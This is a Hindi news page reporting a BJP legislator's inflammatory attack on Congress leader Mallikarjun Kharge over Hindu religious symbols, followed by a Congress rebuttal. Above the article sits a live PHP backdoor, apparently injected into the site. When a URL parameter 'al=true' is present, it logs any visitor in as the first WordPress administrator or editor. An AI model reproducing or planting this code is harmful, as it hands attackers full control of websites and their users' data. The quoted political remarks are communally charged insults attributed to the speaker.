// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); कांग्रेस का स्वदेशी भाव खत्म हो गया है महात्मा गांधी ने देश में रामराज जी की कल्पना की थी, कांग्रेस ने राम को ही नकार कर दिया : रामेश्वर शर्मा – प्रत्युषा आशा की नयी किरण
राजनीती

कांग्रेस का स्वदेशी भाव खत्म हो गया है महात्मा गांधी ने देश में रामराज जी की कल्पना की थी, कांग्रेस ने राम को ही नकार कर दिया : रामेश्वर शर्मा

भोपाल
 कांग्रेस के राष्ट्रीय अध्यक्ष मल्लिकार्जुन खरगे के बयान पर बीजेपी ने सियासी हमला बोला है। विधायक रामेश्वर शर्मा ने कहा है कि- कांग्रेस विदेशी हुकूमत के हिसाब से चलती है। कांग्रेस का जन्मदाता भी विदेशी हुकूमत है और कांग्रेस का नेतृत्वकर कर्तव्य विदेशी है। कांग्रेस का स्वदेशी भाव खत्म हो गया है महात्मा गांधी ने देश में रामराज जी की कल्पना की थी। कांग्रेस ने राम को ही नकार कर दिया है। पाकिस्तान के टुकड़ों पर पलने वाली आज की कांग्रेस है। पिताजी ने आपका नाम मल्लिकार्जुन रखा। आपसे उम्मीद थी कि आप राम, गंगा, गौ माता को जानते होंगे गीता, गंगा, गौ माता भारत की आत्मा हैं। आपने भारत की आत्मा पर प्रहार किया है। कांग्रेसी बिरयानी खाने चले जाएंगे। रोजा इफ्तारी करने चले जाएंगे। आतंकवादियों की मौत पर आंसू बहाने चले जाएंगे लेकिन गंगा में डुबकी लगाने नहीं जाएंगे। गया में गंगा जी का ही घाट है। लोग जहां पिंडदान करते हैं जो डुबकी लगा रही हैं वह प्रार्थना कर रहे हैं कि कांग्रेस से पिंडदान छुड़ाओ। नाक रगड़कर माफी मांगे नहीं तो जनता गंगा घाट पर कांग्रेस का पिंडदान कर देगी।

तुम्हारे बाप पाकिस्तान में बैठे

कहा कि- सोनिया गांधी के इशारे पर रामकृष्ण गौतम महावीर का अपमान हो रहा है। कांग्रेस का पूरा कुनबा सनातन विरोधी है हम गंगा में डुबकी लगाएंगे मोक्ष भी मिलता है और गंगा में डुबकी लगाने से अरबों का व्यापार भी होता है। जहां जवाहरलाल नेहरू पैदा हुए वहां की भूमि पर जाकर आम लोगों से पूछो कि कितना व्यवसाय चल रहा है। फूल, अगरबत्ती, नारियल, टेंट वालों से पूछो कितना व्यवसाय होता है। गंगा राम गीता माता गौ माता का अपमान कर रही है। कांग्रेसी डुबकी वाले फोटो इसलिए नहीं खिंचवा सकते क्योंकि तुम्हारे बाप पाकिस्तान में बैठे हैं।

कांग्रेस का पलटवार

रामेश्वर शर्मा के बयान पर कांग्रेस ने पलटवार किया है। पूर्व विधायक शैलेंद्र पटेल ने कहा- रामेश्वर शर्मा मल्लिकार्जुन खरगे के बयान का अर्थ समझिए। बयान की गहराई में जाइए, धर्म की आड़ में पाप छुपाने का काम न करें। आपका काम है गरीबी दूर करना, गरीबी दूर हो नहीं रही, विकास हो नहीं रहा और अनर्गल बयानबाजी कर रहे हैं।

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड